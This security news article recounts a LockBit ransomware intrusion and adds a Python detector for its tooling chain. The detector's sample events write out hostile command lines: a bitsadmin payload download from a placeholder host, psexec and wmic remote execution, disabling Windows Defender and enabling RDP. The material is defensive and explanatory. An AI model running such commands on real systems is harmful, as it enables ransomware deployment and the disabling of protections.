Threat actors demonstrated a methodical approach in a recent cyberattack, taking 11 days from initial compromise to fully deploy LockBit ransomware across a victim’s network.
The incident, detailed in a report by The DFIR Report, showcases the evolving tactics of ransomware operators and the critical need for robust cybersecurity measures.
The attack began in late January 2024 when an unsuspecting user downloaded and executed a file named “setup_wm.exe” from a malicious website.
This executable, masquerading as a legitimate Windows Media Configuration Utility, was actually a Cobalt Strike beacon.
Within 30 minutes of execution, the beacon initiated discovery commands, starting with nltest to identify domain controllers.
Security analysts at The DFIR Report noted that, leveraging the compromised user's elevated permissions, the attackers deployed two proxy tools, SystemBC and GhostSOCKS, onto a domain controller using SMB and remote services.
While Windows Defender detected and blocked GhostSOCKS, the SystemBC proxy remained active, establishing a command and control channel.
Initial Access
The threat actors then employed a variety of tools and techniques to expand their foothold.
They used PsExec and PowerShell for lateral movement, deployed additional Cobalt Strike beacons, and utilized tools like Seatbelt and SharpView for network reconnaissance. Persistence was established through scheduled tasks and registry modifications.
A critical phase of the attack involved data exfiltration. The attackers used Internet Explorer to access temporary file-sharing sites and later employed Rclone for large-scale data theft.
Initial attempts to exfiltrate via FTP failed, but subsequent efforts using Mega.io and a different FTP server were successful, resulting in several gigabytes of data being stolen over a 16-hour period.
On the eleventh day, the attackers shifted focus to ransomware deployment. They used the backup server as a staging ground, dropping multiple batch scripts to automate the process.
The LockBit ransomware binary, named “ds.exe,” was distributed across remote hosts using tools like PsExec and BITSAdmin. The threat actors executed the ransomware remotely via both WMI and PsExec.
To facilitate the attack, additional scripts were deployed to disable Windows Defender and modify RDP settings across the network.
The ransomware was successfully propagated to all Windows hosts within the environment, achieving a Time to Ransomware (TTR) of just under 239 hours.
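The tooling chain described above (nltest discovery, PsExec and BITSAdmin staging, WMI remote execution, Defender and RDP tampering, Rclone exfiltration) is visible in process-creation telemetry. The following is an added detection example, not code from The DFIR Report; the event records and command lines are constructed, the regexes are illustrative heuristics, and the logic flags a host only when several stages of the chain appear on it, since one matching command is a weaker signal than a sequence.

```python
import re
from collections import defaultdict

# Heuristics keyed to the tools named in the write-up. Each entry is
# (stage label, regex over the process command line). Illustrative patterns only.
RULES = [
    ("domain_discovery",   re.compile(r"\bnltest(\.exe)?\b.*?/dclist", re.I)),
    ("psexec_remote_exec", re.compile(r"\bpsexe(c|svc)(\.exe)?\b", re.I)),
    ("bits_transfer",      re.compile(r"\bbitsadmin(\.exe)?\b.*?/transfer", re.I)),
    ("wmi_remote_exec",    re.compile(r"\bwmic(\.exe)?\b.*?process\s+call\s+create", re.I)),
    ("defender_disable",   re.compile(r"Set-MpPreference.*?-Disable\w+", re.I)),
    ("rdp_enable",         re.compile(r"fDenyTSConnections.*?/d\s+0", re.I)),
    ("rclone_exfil",       re.compile(r"\brclone(\.exe)?\b.*?\b(copy|sync|move)\b", re.I)),
]

def classify(cmdline):
    """Return the stage labels whose pattern matches this command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]

def stages_per_host(events):
    """Map host -> set of distinct stage labels seen across all of its events."""
    seen = defaultdict(set)
    for ev in events:
        for label in classify(ev["cmd"]):
            seen[ev["host"]].add(label)
    return dict(seen)

def flag_hosts(events, min_stages=2):
    """Hosts showing at least min_stages distinct stages of the chain, sorted by name."""
    return sorted(h for h, s in stages_per_host(events).items() if len(s) >= min_stages)

# Constructed sample process-creation events (host name, command line); not from the report.
SAMPLE_EVENTS = [
    {"host": "WS01", "cmd": "nltest /dclist:corp.local"},
    {"host": "WS01", "cmd": "notepad.exe C:\\Users\\user\\notes.txt"},
    {"host": "BACKUP01", "cmd": "bitsadmin /transfer job /download /priority high http://PLACEHOLDER/ds.exe C:\\ds.exe"},
    {"host": "BACKUP01", "cmd": "psexec.exe \\\\SRV03 -s -d C:\\ds.exe"},
    {"host": "BACKUP01", "cmd": "wmic /node:SRV02 process call create \"C:\\ds.exe\""},
    {"host": "BACKUP01", "cmd": "powershell -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "SRV02", "cmd": "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"},
]

if __name__ == "__main__":
    for host, stages in stages_per_host(SAMPLE_EVENTS).items():
        print(host, sorted(stages))
    print("flagged:", flag_hosts(SAMPLE_EVENTS))
```

On the sample set only BACKUP01 crosses the two-stage threshold, matching the write-up's picture of the backup server as the staging host; a single nltest on a workstation is reported but not flagged on its own.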
Organizations must remain vigilant and proactive in their cybersecurity efforts to defend against such lengthy and planned attacks.